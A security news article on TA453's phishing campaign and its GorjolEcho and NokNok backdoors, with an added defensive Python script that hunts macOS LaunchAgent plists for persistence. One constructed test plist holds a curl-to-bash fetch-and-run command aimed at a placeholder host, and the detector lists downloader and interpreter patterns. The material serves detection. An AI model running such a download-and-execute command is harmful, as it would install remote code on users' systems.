Advanced Iranian Hacker Malware Targets Windows and macOS Users


July 06, 2023 | Ravie Lakshmanan | Endpoint/Malware Security


The Iranian nation-state actor known as TA453 has been linked to a series of new spear-phishing attacks that infected Windows and macOS operating systems with malware.

“TA453 ended up using multiple cloud hosting providers to deliver a new infection chain implementing the newly identified GorjolEcho PowerShell backdoor,” Proofpoint said in a new report.

“When given the chance, TA453 ported its malware and attempted to launch an Apple-flavored infection chain dubbed NokNok. TA453 also employs multi-person impersonation in its endless quest for espionage.”

TA453, also known as APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, is a threat group associated with Iran's Islamic Revolutionary Guard Corps (IRGC) that has been active since at least 2011. More recently, Volexity highlighted the adversary's use of an updated version of a PowerShell implant called CharmPower (aka GhostEcho or POWERSTAR).

In the attack sequence discovered by the enterprise security firm in mid-May 2023, the hacking crew sent a phishing email to a nuclear security expert at a U.S.-based think tank focused on foreign affairs. The email carried a malicious link to a Google Script macro that redirected the target to a Dropbox URL hosting a RAR archive.


Present within the archive is a LNK dropper that kicks off a multi-stage procedure to ultimately deploy GorjolEcho, which, in turn, displays a decoy PDF document while silently awaiting next-stage payloads from a remote server.

But after realizing that the target was using an Apple computer, TA453 is said to have tweaked its modus operandi to send a second email with a ZIP archive embedding a Mach-O binary that masquerades as a VPN app but is, in fact, an AppleScript that reaches out to a remote server to download a Bash script-based backdoor called NokNok.



NokNok, for its part, incorporates as many as four modules capable of gathering running processes, installed applications, and system metadata, and of establishing persistence using LaunchAgents.

NokNok "reflects most of the functionality" of the modules associated with CharmPower, and it shares some overlapping source code with macOS malware previously attributed to the group in 2017.
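The LaunchAgents persistence described above is something a defender can hunt for directly. What follows is an added example, not Proofpoint's code and not a NokNok signature: it parses LaunchAgent plists and flags entries with the traits a script-based backdoor needs to survive a reboot, such as a shell or AppleScript interpreter launched with inline code, a curl-to-shell chain, an embedded URL, or a binary run from a temp or hidden path. The two plists are constructed for illustration, the indicator list is an assumption about typical script-backdoor tradecraft, and the URL is a placeholder.

```python
"""Hunt macOS LaunchAgent plists for script-based persistence.

Added example for illustration only. The sample plists below are
constructed, and the indicator lists are assumptions about what a
Bash/AppleScript backdoor typically needs from launchd; they are not
published indicators for NokNok.
"""
import plistlib
import re
from pathlib import Path

# Interpreters a script backdoor would hand launchd instead of a real binary.
SCRIPT_INTERPRETERS = {"bash", "sh", "zsh", "osascript", "python", "python3", "perl"}
# Flags that pass code inline rather than pointing at a reviewable file.
INLINE_CODE_FLAGS = {"-c", "-e"}
# Download tools commonly chained into a shell in one-liners.
DOWNLOADERS = re.compile(r"\b(curl|wget)\b", re.IGNORECASE)
# User-writable locations a dropper can reach without privileges.
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/private/tmp/", "/Users/Shared/")


def program_arguments(plist):
    """Return the launch command, honouring both Program and ProgramArguments."""
    args = list(plist.get("ProgramArguments") or [])
    if not args and plist.get("Program"):
        args = [plist["Program"]]
    return [str(a) for a in args]


def score_launch_agent(plist):
    """Return the reasons a LaunchAgent looks suspicious (empty list if none)."""
    reasons = []
    args = program_arguments(plist)
    if not args:
        return reasons
    exe = Path(args[0]).name
    joined = " ".join(args)
    if exe in SCRIPT_INTERPRETERS:
        reasons.append(f"launches a script interpreter ({exe})")
    if any(a in INLINE_CODE_FLAGS for a in args[1:]):
        reasons.append("passes inline code to the interpreter")
    if DOWNLOADERS.search(joined):
        reasons.append("invokes a download tool")
    if re.search(r"https?://", joined):
        reasons.append("embeds a URL")
    if any(a.startswith(WRITABLE_PREFIXES) or "/." in a for a in args):
        reasons.append("references a temp or hidden path")
    # Auto-start plus KeepAlive is normal for agents, so only count it
    # as corroboration once another indicator has already fired.
    if plist.get("RunAtLoad") and plist.get("KeepAlive") and reasons:
        reasons.append("auto-starts and is kept alive by launchd")
    return reasons


def scan_launch_agents(plists):
    """plists: mapping of file name -> raw plist bytes. Returns name -> reasons for flagged entries."""
    findings = {}
    for name, raw in plists.items():
        try:
            data = plistlib.loads(raw)
        except Exception:  # malformed XML or binary plist; worth a look on its own
            findings[name] = ["unparseable plist"]
            continue
        reasons = score_launch_agent(data)
        if reasons:
            findings[name] = reasons
    return findings


def load_launch_agent_dir(directory):
    """Read every .plist under a LaunchAgents directory into the mapping scan_launch_agents expects."""
    return {p.name: p.read_bytes() for p in Path(directory).glob("*.plist")}


# Constructed samples: one ordinary vendor updater, one Apple-lookalike label
# that really runs a curl-to-bash one-liner. The URL is a placeholder.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/Applications/Example.app/Contents/MacOS/ExampleUpdater</string><string>--check</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate.agent</string>
  <key>ProgramArguments</key>
  <array><string>/bin/bash</string><string>-c</string>
  <string>curl -fsSL http://example.invalid/stage2.sh | bash</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

SAMPLE_PLISTS = {
    "com.example.updater.plist": BENIGN_PLIST,
    "com.apple.softwareupdate.agent.plist": SUSPICIOUS_PLIST,
}

if __name__ == "__main__":
    for name, reasons in scan_launch_agents(SAMPLE_PLISTS).items():
        print(name, "->", "; ".join(reasons))
```

To run it against a live system, pass `load_launch_agent_dir(Path.home() / "Library/LaunchAgents")` (and the `/Library/LaunchAgents` and `/Library/LaunchDaemons` directories) to `scan_launch_agents`. The heuristics favour recall over precision, so treat a hit as a triage lead and confirm by inspecting the referenced script or binary.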

The actor also uses bogus file-sharing websites that likely serve to fingerprint visitors and act as a mechanism to track successful victims.

“TA453 continues to adapt its malware arsenal, deploy new file types, and target new operating systems,” the researchers said, adding the actor “continues to work toward the same end goal of intrusive and unauthorized reconnaissance” while complicating detection efforts.
